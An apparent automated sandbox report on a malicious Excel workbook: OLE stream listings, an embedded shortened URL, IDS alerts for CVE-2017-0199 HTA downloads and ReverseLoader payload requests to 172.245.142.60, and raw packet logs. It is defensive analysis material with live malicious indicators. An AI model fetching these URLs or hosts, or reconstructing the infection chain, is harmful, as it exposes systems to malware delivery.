                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:20
                                                                                            Entropy:0.5689955935892812
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/\x3ObjInfo
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:4
                                                                                            Entropy:0.8112781244591328
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/Contents
                                                                                            CLSID:
                                                                                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                            Stream Size:197671
                                                                                            Entropy:6.989042939766534
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0068D442/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0068D442/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:26243
                                                                                            Entropy:7.635433729726103
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:248
                                                                                            Entropy:3.0523231150355867
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:256
                                                                                            Entropy:4.086306928392587
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:134792
                                                                                            Entropy:7.974168320310173
                                                                                            Base64 Encoded:True
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                                            CLSID:
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Stream Size:468
                                                                                            Entropy:5.269289820125323
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:83
                                                                                            Entropy:3.0672749060249043
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:2486
                                                                                            Entropy:3.9244127831265385
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:536
                                                                                            Entropy:6.330646364694152
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD00726B69/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD00726B69/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:26242
                                                                                            Entropy:7.635424485665502
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:283872
                                                                                            Entropy:7.743278150467805
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A10/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:674
                                                                                            Entropy:5.211501021212276
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . 2 - ; . . . . . . . . . . . . ` . . . y . . . K . \\ . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . z . x . r . u . d . b . ? . & . m . i . l . e . = . s . n . o . t . t . y . & . m . e . t . r . o . = . w . o . r . k . a . b . l . e . & . g . a . s . t . r . o . p . o . d . = . a . v . a . i . l . a . b . l . e . & . m . o . n . s . t . e . r . = . r . e . f . l . e . c . t . i . v . e . & . g . e . a . r . s . h . i . f . t . . . e . . + * a b
                                                                                            General
                                                                                            Stream Path:Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:335347
                                                                                            Entropy:7.9986545009414405
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . R - . . P [ 4 . 5 ~ g _ 1 N P k . u , w . > I s . . . . . . . . k . . . \\ . p . b H C U L . . . \\ k } . ? . p 8 C = W d / 3 A q n 9 . & D [ D . . . " . p F P . l n . d . W 3 7 w h $ > [ T . P = . . . B . . . . a . . . k . . . = . . . W S ) i . . . d ! x h . . . . D . . . . 9 . . . . w s . . . . j . . . m . . . . Z = . . . . . I . I 9 , . z L A @ . . . . . . . " . . . . . . . . r . . . . . . . 1 . . . J N } . . , . u ~ Z . I / . t 1 . . . . @ V ; ) X c .
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                            CLSID:
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Stream Size:523
                                                                                            Entropy:5.2345232274244715
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:I D = " { D E 1 0 8 E 2 0 - 6 1 4 B - 4 6 4 7 - A 9 3 8 - 7 1 3 9 1 9 2 6 8 6 A E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 9 5 C F A 9 D 3 A 9 D 3 A
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:104
                                                                                            Entropy:3.0488640812019017
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:2644
                                                                                            Entropy:3.986387706756239
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:553
                                                                                            Entropy:6.34899372541908
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . E j i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T06:57:45.530608+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 172.245.142.60 | 80 | TCP
2024-12-10T06:57:45.530721+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.142.60 | 80 | 192.168.2.22 | 49164 | TCP
2024-12-10T06:57:50.178973+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 172.245.142.60 | 80 | TCP
2024-12-10T06:57:50.179073+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.142.60 | 80 | 192.168.2.22 | 49166 | TCP
2024-12-10T06:57:58.219043+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49167 | 172.245.142.60 | 80 | TCP
2024-12-10T06:58:13.226642+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49173 | 172.245.142.60 | 80 | TCP
2024-12-10T06:58:33.137505+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 151.101.1.137 | 443 | 192.168.2.22 | 49174 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Dec 10, 2024 06:57:45.944844007 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.944885969 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.949291945 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.949352026 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.949419975 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.949462891 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.953798056 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.953857899 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.953900099 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.953944921 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.958306074 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.958349943 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.958400011 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.958446980 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.962856054 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.962907076 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.962929010 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.962970972 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.967371941 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.967415094 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.967469931 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.967514038 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.971908092 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.971963882 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.972016096 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.972059011 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.976457119 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.976511955 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.976614952 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.976659060 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.981002092 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.981045961 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.981080055 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.981123924 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.985512018 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.985562086 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.985567093 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.985610008 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.987858057 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.987894058 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:46.634475946 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.634547949 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:46.634661913 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.647146940 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.647202969 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.221975088 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.222043991 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.228241920 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.228279114 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.228524923 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.228574991 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.306405067 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.347336054 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905425072 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905483007 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905662060 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.905663013 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.907073021 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.907095909 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.919837952 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.039042950 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:49.039118052 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.039467096 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.158693075 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.178848028 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.178972960 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179073095 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179089069 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179096937 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179102898 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179107904 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179114103 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179193974 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179219961 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179231882 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179244041 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179267883 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179277897 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.184976101 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.298675060 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.298718929 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.298763990 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.298783064 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.302592039 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.302644968 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.371293068 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.371337891 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.371346951 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.371390104 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.375382900 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.375423908 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.375511885 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.375550985 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.383754969 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.383807898 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.383837938 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.383877993 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.392096043 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.392162085 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.392194986 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.392229080 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.400484085 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.400544882 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.400650978 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.400692940 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.408827066 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.408890009 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.408935070 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.408973932 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.417190075 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.417258978 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.417303085 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.417341948 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.425483942 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.425544977 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.425585032 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.425625086 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.433830023 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.433926105 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.433960915 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.434000015 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.442205906 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.442282915 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.442318916 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.442368984 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.449892998 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.449953079 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.450021029 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.450061083 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.563476086 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.563488007 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.563559055 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.564743042 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.564798117 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.564862013 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.564905882 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.569509029 CET8049166172.245.142.60192.168.2.22
